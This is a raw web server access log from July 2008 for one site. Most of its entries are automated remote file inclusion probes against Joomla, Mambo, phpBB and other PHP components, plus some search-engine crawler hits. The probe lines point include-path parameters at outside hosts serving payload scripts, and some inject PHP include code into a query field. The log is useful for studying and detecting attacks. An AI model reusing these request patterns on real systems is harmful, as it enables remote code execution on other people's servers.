80.67.25.167 - - [13/Jul/2008:11:23:59 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.kita-billstedt.de/willkommen/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
65.214.45.149 - - [13/Jul/2008:11:24:16 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.dmulk.com"
65.214.45.149 - - [13/Jul/2008:11:24:18 -0700] "GET /?show=gallery&pageid=17&nggpage=2 HTTP/1.0" 200 54372 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.dmulk.com"
89.111.176.64 - - [13/Jul/2008:11:24:20 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.64 - - [13/Jul/2008:11:24:20 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.65.79 - - [13/Jul/2008:11:24:23 -0700] "GET /logs/access_080103.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.206.113.104 - - [13/Jul/2008:11:24:46 -0700] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.113.104 - - [13/Jul/2008:11:24:48 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 200 18503 "-" "libwww-perl/5.805" "www.dmulk.com"
116.125.113.115 - - [13/Jul/2008:11:24:48 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
213.206.113.104 - - [13/Jul/2008:11:24:49 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
116.125.113.115 - - [13/Jul/2008:11:24:49 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://legalref.ru/config/idscan.txt? HTTP/1.1" 200 3694 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
194.143.183.8 - - [13/Jul/2008:11:25:22 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:11:25:24 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.113.104 - - [13/Jul/2008:11:26:36 -0700] "GET /logs/access_080117.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.34.140.215 - - [13/Jul/2008:11:26:52 -0700] "GET /logs/encapscms_PATH/core/core.php?root=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.140.215 - - [13/Jul/2008:11:26:52 -0700] "GET /encapscms_PATH/core/core.php?root=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.110.250.75 - - [13/Jul/2008:11:26:56 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.110.250.75 - - [13/Jul/2008:11:27:13 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 200 18525 "-" "libwww-perl/5.79" "www.dmulk.com"
217.217.156.81 - - [13/Jul/2008:11:27:50 -0700] "GET /logs/access_080207.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
80.93.62.99 - - [13/Jul/2008:11:27:52 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.92.144.58 - - [13/Jul/2008:11:28:43 -0700] "GET /logs/access.log//?pg=http://jaramadonna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.164.225.11 - - [13/Jul/2008:11:28:44 -0700] "GET /logs/access_080218.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [13/Jul/2008:11:28:44 -0700] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [13/Jul/2008:11:28:44 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:11:28:49 -0700] "GET /logs/encapscms_PATH/core/core.php?root=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:11:28:49 -0700] "GET /encapscms_PATH/core/core.php?root=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.206.113.104 - - [13/Jul/2008:11:29:01 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 200 18487 "-" "libwww-perl/5.805" "www.dmulk.com"
202.164.225.11 - - [13/Jul/2008:11:29:06 -0700] "GET /logs/access_080118.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.101.24 - - [13/Jul/2008:11:29:16 -0700] "GET /logs/encapscms_PATH/core/core.php?root=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [13/Jul/2008:11:29:17 -0700] "GET /encapscms_PATH/core/core.php?root=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.58.187 - - [13/Jul/2008:11:29:19 -0700] "GET /logs/ HTTP/1.0" 200 55977 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.227.65.79 - - [13/Jul/2008:11:29:40 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [13/Jul/2008:11:29:42 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 200 18595 "-" "libwww-perl/5.76" "www.dmulk.com"
89.248.101.56 - - [13/Jul/2008:11:30:23 -0700] "GET /logs/access_080329.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.248.101.56 - - [13/Jul/2008:11:30:26 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.206.113.104 - - [13/Jul/2008:11:30:29 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.101.56 - - [13/Jul/2008:11:30:31 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.206.113.104 - - [13/Jul/2008:11:30:33 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 200 18503 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [13/Jul/2008:11:30:34 -0700] "GET /logs/index.php?inc_dir=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [13/Jul/2008:11:30:36 -0700] "GET /index.php?inc_dir=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 200 18415 "-" "libwww-perl/5.810" "www.dmulk.com"
87.101.4.42 - - [13/Jul/2008:11:30:51 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [13/Jul/2008:11:30:54 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 200 18503 "-" "libwww-perl/5.79" "www.dmulk.com"
85.234.133.173 - - [13/Jul/2008:11:31:41 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.86.157.145 - - [13/Jul/2008:11:31:41 -0700] "GET /logs/access_080329.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://buddiespace.com/mp3/source/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.86.157.145 - - [13/Jul/2008:11:31:41 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://buddiespace.com/mp3/source/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.86.157.145 - - [13/Jul/2008:11:31:41 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://buddiespace.com/mp3/source/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.86.157.145 - - [13/Jul/2008:11:31:43 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://buddiespace.com/mp3/source/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.234.133.173 - - [13/Jul/2008:11:31:43 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 200 18503 "-" "libwww-perl/5.811" "www.dmulk.com"
194.143.183.8 - - [13/Jul/2008:11:31:46 -0700] "GET /logs/access_080218.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.143.183.8 - - [13/Jul/2008:11:31:46 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:11:32:26 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:11:32:27 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.76.203.217 - - [13/Jul/2008:11:32:45 -0700] "GET /logs/access_080313.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://realbori.com/bbs/dosiris.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.76.203.217 - - [13/Jul/2008:11:32:45 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://realbori.com/bbs/dosiris.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.52.139.226 - - [13/Jul/2008:11:33:16 -0700] "GET /logs/access_080128.log/index.php?inc_dir=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [13/Jul/2008:11:33:22 -0700] "GET /logs/access_080112.log/index.php?inc_dir=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.143.183.8 - - [13/Jul/2008:11:33:36 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:11:33:40 -0700] "GET /logs/access_080507.log/encapscms_PATH/core/core.php?root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.234.133.173 - - [13/Jul/2008:11:33:55 -0700] "GET /errors.php?error=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
85.234.133.173 - - [13/Jul/2008:11:33:55 -0700] "GET /logs/errors.php?error=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
208.76.203.217 - - [13/Jul/2008:11:34:05 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://realbori.com/bbs/dosiris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.29.34 - - [13/Jul/2008:11:34:47 -0700] "GET /logs/access_080313.log/index.php?pag=http://www.leokaris.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.76.203.217 - - [13/Jul/2008:11:34:48 -0700] "GET /logs/access_080313.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://realbori.com/bbs/dosiris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.76.203.217 - - [13/Jul/2008:11:34:48 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://realbori.com/bbs/dosiris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.76.203.217 - - [13/Jul/2008:11:34:48 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://realbori.com/bbs/dosiris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.29.34 - - [13/Jul/2008:11:34:52 -0700] "GET /index.php?pag=http://www.leokaris.com/bajo.txt????? HTTP/1.1" 200 18403 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.29.34 - - [13/Jul/2008:11:34:53 -0700] "GET /logs/index.php?pag=http://www.leokaris.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.143.183.8 - - [13/Jul/2008:11:35:05 -0700] "GET /logs/access_080207.log//components/errors.php?error=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.143.183.8 - - [13/Jul/2008:11:35:05 -0700] "GET /logs//components/errors.php?error=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.253.62 - - [13/Jul/2008:11:35:11 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=[INJEKAN]!idhttp://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
82.165.253.62 - - [13/Jul/2008:11:35:11 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=[INJEKAN]!idhttp://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
194.143.183.8 - - [13/Jul/2008:11:36:00 -0700] "GET /logs/access_071224.log//components/errors.php?error=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
38.117.65.239 - - [13/Jul/2008:11:36:04 -0700] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.86.157.145 - - [13/Jul/2008:11:36:18 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://buddiespace.com/mp3/source/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.253.62 - - [13/Jul/2008:11:36:18 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
216.86.157.145 - - [13/Jul/2008:11:36:18 -0700] "GET /lostpasswd.php?env[include_prefix]=http://buddiespace.com/mp3/source/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.86.157.145 - - [13/Jul/2008:11:36:19 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://buddiespace.com/mp3/source/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.253.62 - - [13/Jul/2008:11:36:19 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 200 3694 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
72.20.1.30 - - [13/Jul/2008:11:36:45 -0700] "GET /logs/access_071219.log/login.php?svr_rootscript=http://cncteknix.com/portal//components/com_joomlalib/standalone/idfile.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
72.20.1.30 - - [13/Jul/2008:11:36:46 -0700] "GET /login.php?svr_rootscript=http://cncteknix.com/portal//components/com_joomlalib/standalone/idfile.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
72.20.1.30 - - [13/Jul/2008:11:36:46 -0700] "GET /logs/login.php?svr_rootscript=http://cncteknix.com/portal//components/com_joomlalib/standalone/idfile.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
216.86.157.145 - - [13/Jul/2008:11:37:03 -0700] "GET /logs/access_080329.log/lostpasswd.php?env[include_prefix]=http://buddiespace.com/mp3/source/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.29.34 - - [13/Jul/2008:11:37:05 -0700] "GET /logs/access_080218.log/index.php?pag=http://www.leokaris.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.143.183.8 - - [13/Jul/2008:11:37:41 -0700] "GET /logs/access_080329.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.143.183.8 - - [13/Jul/2008:11:37:41 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.84 - - [13/Jul/2008:11:37:43 -0700] "GET /logs/access_080313.log/index.php?pag=http://www.leokaris.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.143.183.8 - - [13/Jul/2008:11:37:43 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.84 - - [13/Jul/2008:11:37:47 -0700] "GET /index.php?pag=http://www.leokaris.com/bajo.txt????? HTTP/1.1" 200 18387 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.84 - - [13/Jul/2008:11:37:48 -0700] "GET /logs/index.php?pag=http://www.leokaris.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.1.30 - - [13/Jul/2008:11:37:52 -0700] "GET /logs/login.php?svr_rootscript=http://cncteknix.com/portal//components/com_joomlalib/standalone/idfile.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
72.20.1.30 - - [13/Jul/2008:11:37:52 -0700] "GET /login.php?svr_rootscript=http://cncteknix.com/portal//components/com_joomlalib/standalone/idfile.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:11:37:54 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:11:37:55 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.76.203.217 - - [13/Jul/2008:11:37:59 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://realbori.com/bbs/dosiris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.76.203.217 - - [13/Jul/2008:11:37:59 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://realbori.com/bbs/dosiris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:11:38:00 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.76.203.217 - - [13/Jul/2008:11:38:03 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://realbori.com/bbs/dosiris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.76.203.217 - - [13/Jul/2008:11:38:04 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://realbori.com/bbs/dosiris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:11:38:06 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [13/Jul/2008:11:38:15 -0700] "GET /logs/access.log////////?mosConfig_admin_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [13/Jul/2008:11:38:19 -0700] "GET ////////?mosConfig_admin_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 200 18417 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [13/Jul/2008:11:38:20 -0700] "GET /logs////////?mosConfig_admin_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 200 56004 "-" "libwww-perl/5.79" "www.dmulk.com"
38.117.65.239 - - [13/Jul/2008:11:38:24 -0700] "GET /logs/access_080118.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.117.65.239 - - [13/Jul/2008:11:38:25 -0700] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.214.192.29 - - [13/Jul/2008:11:38:25 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.117.65.239 - - [13/Jul/2008:11:38:25 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.214.192.29 - - [13/Jul/2008:11:38:34 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.211.25 - - [13/Jul/2008:11:38:41 -0700] "GET /megumi/minamigrad2k8/IMG_1705.CR2 HTTP/1.1" 200 196608 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
88.214.192.29 - - [13/Jul/2008:11:38:58 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
